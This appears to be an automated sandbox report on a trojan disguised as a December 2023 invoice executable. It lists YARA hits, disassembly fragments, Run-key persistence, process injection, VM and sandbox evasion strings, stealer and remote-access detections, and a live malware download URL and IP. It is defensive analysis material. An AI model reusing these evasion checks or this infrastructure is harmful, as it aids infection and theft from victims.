                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c122930e38.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.fikk.exe.1d9099fbbb0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c127810000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c122b10ea8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c1228b8dc8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.fikk.exe.1d9099fbbb0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c1228b8dc8.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.invoices---DEC_2023.exe.1c10ebade48.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.fikk.exe.279106b9938.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2048259063.000001C127810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2525528464.000002797BC70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2039823779.000001C12266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: invoices---DEC_2023.exe PID: 2148, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: invoices---DEC_2023.exe PID: 748, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: fikk.exe PID: 4448, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: fikk.exe PID: 1976, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: fikk.exe PID: 3372, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: fikk.exe PID: 3812, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 0_2_00007FF848F180F1 push ecx; iretd 0_2_00007FF848F180F4
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848F4184B push eax; iretd 2_2_00007FF848F41871
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848F42650 push FFFFFFBEh; ret 2_2_00007FF848F42652
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848F400BD pushad ; iretd 2_2_00007FF848F400C1
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848F4533A push esi; retf 2_2_00007FF848F4533D
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848F45366 push ds; retf 2_2_00007FF848F45375
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Code function: 2_2_00007FF848F455C5 push edi; iretd 2_2_00007FF848F455D6
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 3_2_00007FF848F400BD pushad ; iretd 3_2_00007FF848F400C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 3_2_00007FF848F480F1 push ecx; iretd 3_2_00007FF848F480F4
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848F32650 push FFFFFFBEh; ret 5_2_00007FF848F32652
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848F355C5 push edi; iretd 5_2_00007FF848F355D6
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848F3184B push eax; iretd 5_2_00007FF848F31871
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848F300BD pushad ; iretd 5_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848F3533A push esi; retf 5_2_00007FF848F3533D
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 5_2_00007FF848F35366 push ds; retf 5_2_00007FF848F35375
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 6_2_00007FF848F300BD pushad ; iretd 6_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 6_2_00007FF848F380F1 push ecx; iretd 6_2_00007FF848F380F4
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F3184B push eax; iretd 7_2_00007FF848F31871
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F32650 push FFFFFFBEh; ret 7_2_00007FF848F32652
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F300BD pushad ; iretd 7_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F3533A push esi; retf 7_2_00007FF848F3533D
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F35366 push ds; retf 7_2_00007FF848F35375
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F355C5 push edi; iretd 7_2_00007FF848F355D6
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Code function: 7_2_00007FF848F468B5 push edx; ret 7_2_00007FF848F468BB
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | File created: C:\Users\user\AppData\Roaming\fikk.exe
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fikk
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\fikk.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe TID: 2992; Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe TID: 4984; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe TID: 3172; Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 5960; Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 1520; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 6776; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 7032; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\fikk.exe TID: 6768; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Last function: Thread delayed
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread delayed: delay time: 922337203685477
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038331719.000001C10CEA0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV[6P
                      Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: model0Microsoft|VMWare|Virtual
                      Source: invoices---DEC_2023.exe, 00000002.00000002.3249926425.000001EEE8D10000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltureOF
                      Source: fikk.exe, 00000003.00000002.2197305779.000002A4C62E5000.00000004.00000020.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2278103305.000001D907A96000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Memory written: C:\Users\user\Desktop\invoices---DEC_2023.exe base: 140000000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Memory written: C:\Users\user\AppData\Roaming\fikk.exe base: 140000000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Memory written: C:\Users\user\AppData\Roaming\fikk.exe base: 140000000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Thread register set: target process: 748
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread register set: target process: 1976
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Thread register set: target process: 3812
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Process created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exe
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Process created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exe
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Process created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exe
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Queries volume information: C:\Users\user\Desktop\invoices---DEC_2023.exe VolumeInformation
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Queries volume information: C:\Users\user\Desktop\invoices---DEC_2023.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Queries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Queries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Queries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\fikk.exe; Queries volume information: C:\Users\user\AppData\Roaming\fikk.exe VolumeInformation
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: invoices---DEC_2023.exe PID: 2148, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: fikk.exe PID: 4448, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: fikk.exe PID: 3372, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match; File source: 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: invoices---DEC_2023.exe PID: 2148, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: fikk.exe PID: 4448, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: fikk.exe PID: 3372, type: MEMORYSTR

                      ATT&CK Matrix (technique cells listed per tactic column; numeric prefixes as shown in the report)

                      Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
                      Execution: 1 Scheduled Task/Job, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
                      Persistence: 1 Scheduled Task/Job, 1 Registry Run Keys / Startup Folder, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
                      Privilege Escalation: 211 Process Injection, 1 Scheduled Task/Job, 1 Registry Run Keys / Startup Folder, Login Hook, Network Logon Script, RC Scripts, Startup Items
                      Defense Evasion: 1 Masquerading, 1 Disable or Modify Tools, 21 Virtualization/Sandbox Evasion, 211 Process Injection, 1 Deobfuscate/Decode Files or Information, 1 Obfuscated Files or Information, 2 Software Packing
                      Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
                      Discovery: 21 Security Software Discovery, 21 Virtualization/Sandbox Evasion, 12 System Information Discovery, System Network Configuration Discovery, Internet Connection Discovery, Wi-Fi Discovery, Remote System Discovery
                      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
                      Collection: 11 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
                      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
                      Command and Control: 1 Encrypted Channel, 1 Non-Standard Port, 1 Ingress Tool Transfer, 1 Non-Application Layer Protocol, 1 Application Layer Protocol, Multiband Communication, Commonly Used Port
                      Network Effects: Exploit SS7 to Redirect Phone Calls/SMS, SIM Card Swap
                      Remote Service Effects: Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                      Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
                      Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
                      Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Source | Detection | Scanner | Label
                      invoices---DEC_2023.exe | 19% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      invoices---DEC_2023.exe | 38% | Virustotal |
                      invoices---DEC_2023.exe | 100% | Avira | HEUR/AGEN.1360909
                      invoices---DEC_2023.exe | 100% | Joe Sandbox ML |
                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Roaming\fikk.exe | 100% | Avira | HEUR/AGEN.1360909
                      C:\Users\user\AppData\Roaming\fikk.exe | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Roaming\fikk.exe | 19% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                      C:\Users\user\AppData\Roaming\fikk.exe | 38% | Virustotal |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      http://45.137.22.163/Wowoqku.wav | 100% | Avira URL Cloud | malware
                      http://127.0.0.1: | 0% | Avira URL Cloud | safe
                      http://45.137.22.163 | 100% | Avira URL Cloud | malware
                      http://45.137.22.163/Wowoqku.wav | 12% | Virustotal |
                      http://45.137.22.163 | 13% | Virustotal |
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://45.137.22.163/Wowoqku.wav | false | 12% Virustotal; Avira URL Cloud: malware | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation

                      Name: https://github.com/mgravell/protobuf-net
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: http://127.0.0.1:
                      Source: invoices---DEC_2023.exe, fikk.exe.0.dr
                      Malicious: false
                      Antivirus Detection: Avira URL Cloud: safe
                      Reputation: unknown

                      Name: http://45.137.22.163
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: 13% Virustotal; Avira URL Cloud: malware
                      Reputation: unknown

                      Name: https://github.com/mgravell/protobuf-neti
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: https://stackoverflow.com/q/14436606/23354
                      Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8BFB000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: https://github.com/mgravell/protobuf-netJ
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2204458886.000002A4DC281000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2283674148.000001D91DB11000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: https://stackoverflow.com/q/11564914/23354;
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: https://stackoverflow.com/q/2152978/23354
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                     IP | Domain | Country | ASN | ASN Name | Malicious
                                     45.137.22.163 | unknown | Netherlands | 51447 | ROOTLAYERNETNL | false
                                     5.252.165.214 | unknown | United States | 64271 | RIXCLOUD-INCUS | false
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1364951
Start date and time: 2023-12-20 09:12:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
